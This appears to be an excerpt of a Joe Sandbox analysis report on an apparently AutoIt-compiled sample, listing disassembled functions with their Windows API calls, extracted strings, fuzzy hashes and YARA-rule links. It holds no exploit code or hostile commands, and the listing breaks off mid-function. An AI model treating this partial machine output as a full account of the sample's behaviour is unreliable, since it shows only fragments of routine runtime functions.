                                                                                                                                                                                                                                                                  Function 00D55524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00D55532
                                                                                                                                                                                                                                                                  • GetDriveTypeW.KERNEL32(?,00D7DC30,?,\\.\,00D7DCD0), ref: 00D5560F
                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00D7DC30,?,\\.\,00D7DCD0), ref: 00D5577B
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                  • Opcode ID: 94c9486cda0b88ff3bbb5af8c32e52318faec3ccc67bf4915816fc1c72f19d07
                                                                                                                                                                                                                                                                  • Instruction ID: b9070cf0d467caa360466107aa012a988752017a9947d28e1a2e75718d343b78
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94c9486cda0b88ff3bbb5af8c32e52318faec3ccc67bf4915816fc1c72f19d07
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C861F130A04A45DFCF26DF24DDA197877A1EF19392B388015EC0AAB299D731DD0ADB71
                                                                                                                                                                                                                                                                  Function 00D71A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00D71BC4
                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00D71BD9
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00D71BE0
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00D71C35
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00D71C55
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00D71C89
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D71CA7
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00D71CB9
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000421,?,?), ref: 00D71CCE
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00D71CE1
                                                                                                                                                                                                                                                                  • IsWindowVisible.USER32(00000000), ref: 00D71D3D
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00D71D58
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00D71D6C
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00D71D84
                                                                                                                                                                                                                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00D71DAA
                                                                                                                                                                                                                                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00D71DC4
                                                                                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00D71DDB
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000412,00000000), ref: 00D71E46
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                  • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                  • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                  • Opcode ID: b843ab91bce075a4c4527e8593397fe4245864cc12a309f30907cb6812689a04
                                                                                                                                                                                                                                                                  • Instruction ID: b014683ff7327c0782d90a39daac5ec0f25a16ea9ca6264d054297378dc6580c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b843ab91bce075a4c4527e8593397fe4245864cc12a309f30907cb6812689a04
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8B16971604341AFD714DF68C985B6ABBE5FF84310F048A1CF99D9B2A1E731E845CBA2
                                                                                                                                                                                                                                                                  Function 00D70CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00D70D81
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D70DBB
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D70E25
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D70E8D
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D70F11
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00D70F61
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D70FA0
                                                                                                                                                                                                                                                                    • Part of subcall function 00CFFD52: _wcslen.LIBCMT ref: 00CFFD5D
                                                                                                                                                                                                                                                                    • Part of subcall function 00D42B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D42BA5
                                                                                                                                                                                                                                                                    • Part of subcall function 00D42B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D42BD7
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                  • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                  • Opcode ID: 8135a0feee470394a661caf8586315899facf2085b7218f65003473ec1b2830a
                                                                                                                                                                                                                                                                  • Instruction ID: fd75845e8427b1f4ec273b8fb4f8717e0b222307f65d3b915fac148492c72a13
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8135a0feee470394a661caf8586315899facf2085b7218f65003473ec1b2830a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0E1C0356043418FC714DF28C99187AB7E6FF84314B188A6CF89A9B3A1EB30ED45DB61
                                                                                                                                                                                                                                                                  Function 00CE2521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CE25F8
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00CE2600
                                                                                                                                                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CE262B
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00CE2633
                                                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00CE2658
                                                                                                                                                                                                                                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00CE2675
                                                                                                                                                                                                                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00CE2685
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00CE26B8
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00CE26CC
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00CE26EA
                                                                                                                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 00CE2706
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00CE2711
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE19CD: GetCursorPos.USER32(?), ref: 00CE19E1
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE19CD: ScreenToClient.USER32(00000000,?), ref: 00CE19FE
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE19CD: GetAsyncKeyState.USER32(00000001), ref: 00CE1A23
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE19CD: GetAsyncKeyState.USER32(00000002), ref: 00CE1A3D
                                                                                                                                                                                                                                                                  • SetTimer.USER32(00000000,00000000,00000028,00CE199C), ref: 00CE2738
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                  • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                  • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                  • Opcode ID: 2e3794069e029f23fc6b8d30c5bdf422bd273114c70fca91c66594c47ebcdceb
                                                                                                                                                                                                                                                                  • Instruction ID: d494433e65f729b621d4ecd5df885ab4c270ec0e6365db63aeaf4b92683440b0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e3794069e029f23fc6b8d30c5bdf422bd273114c70fca91c66594c47ebcdceb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65B13835A00209DFDB14DFA9DD45BAE7BB5EB48314F104229FA1AEB290D774E980CF61
                                                                                                                                                                                                                                                                  Function 00D416D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D41A60
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A6C
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A7B
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A82
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D41A99
                                                                                                                                                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D41741
                                                                                                                                                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D41775
                                                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00D4178C
                                                                                                                                                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00D417C6
                                                                                                                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D417E2
                                                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00D417F9
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00D41801
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00D41808
                                                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D41829
                                                                                                                                                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00D41830
                                                                                                                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D4185F
                                                                                                                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D41881
                                                                                                                                                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D41893
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D418BA
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00D418C1
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D418CA
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00D418D1
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D418DA
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00D418E1
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00D418ED
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00D418F4
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41ADF: GetProcessHeap.KERNEL32(00000008,00D414FD,?,00000000,?,00D414FD,?), ref: 00D41AED
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00D414FD,?), ref: 00D41AF4
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00D414FD,?), ref: 00D41B03
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                  • Opcode ID: 876e612d1be038ec3152d924cbf55ac4ff5069dde1450209091af8f1157faec4
                                                                                                                                                                                                                                                                  • Instruction ID: f3058e34558978ad5547d98299872b7f35494722366331c5c3ebcb644cf86da2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 876e612d1be038ec3152d924cbf55ac4ff5069dde1450209091af8f1157faec4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED713AB6D00209BBDF10DFA5DC45FAEBBB9BF44350F184125E919E6290E7319A85CB70
                                                                                                                                                                                                                                                                  Function 00D6CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D6CF1D
                                                                                                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00D7DCD0,00000000,?,00000000,?,?), ref: 00D6CFA4
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00D6D004
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D6D054
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D6D0CF
                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00D6D112
                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00D6D221
                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00D6D2AD
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00D6D2E1
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00D6D2EE
                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00D6D3C0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                  • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                  • Opcode ID: ef8deba2f8b65b0b7328476f257e77aac03cc338b98105ef419a98ab15f4e5bd
                                                                                                                                                                                                                                                                  • Instruction ID: 94db588c79a7c19555293923dbcdb37cd7daeb222ac13d895158e333ebf11b33
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef8deba2f8b65b0b7328476f257e77aac03cc338b98105ef419a98ab15f4e5bd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01126A356042419FCB14DF15C891B2AB7E6FF88714F08885CF88A9B3A2CB35ED45DBA1
                                                                                                                                                                                                                                                                  Function 00D713BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00D71462
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D7149D
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D714F0
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D71526
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D715A2
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D7161D
                                                                                                                                                                                                                                                                    • Part of subcall function 00CFFD52: _wcslen.LIBCMT ref: 00CFFD5D
                                                                                                                                                                                                                                                                    • Part of subcall function 00D43535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D43547
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                  • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                  • Opcode ID: 3ffd2299d3a281865298aa75512238f388b0d73c1bd6876dfa7196f63ada3bdc
                                                                                                                                                                                                                                                                  • Instruction ID: 4a037ed4046f472ca82711587d461d647aae257d0fbf617766a16732d3468905
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ffd2299d3a281865298aa75512238f388b0d73c1bd6876dfa7196f63ada3bdc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8AE192396043419FC714DF29C45186AB7F2FF94314B188A5CF89A9B361EB30ED45DBA2
                                                                                                                                                                                                                                                                  Function 00D6D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                  • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                  • Opcode ID: f765efca2f3d06a3df131281792cc204af84819f3328a8d99e9b1ab568a4a580
                                                                                                                                                                                                                                                                  • Instruction ID: c1dbae65150223dd934e4e5d0ebcb3c996b67fe01cdf8f5982ab90e73205f5ff
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f765efca2f3d06a3df131281792cc204af84819f3328a8d99e9b1ab568a4a580
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8710572F0016A8BCB109E7CED405BF33A3AF62758B290128FC569B294EA35DD45D7B1
                                                                                                                                                                                                                                                                  Function 00D78D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D78DB5
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D78DC9
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D78DEC
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D78E0F
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00D78E4D
                                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00D76691), ref: 00D78EA9
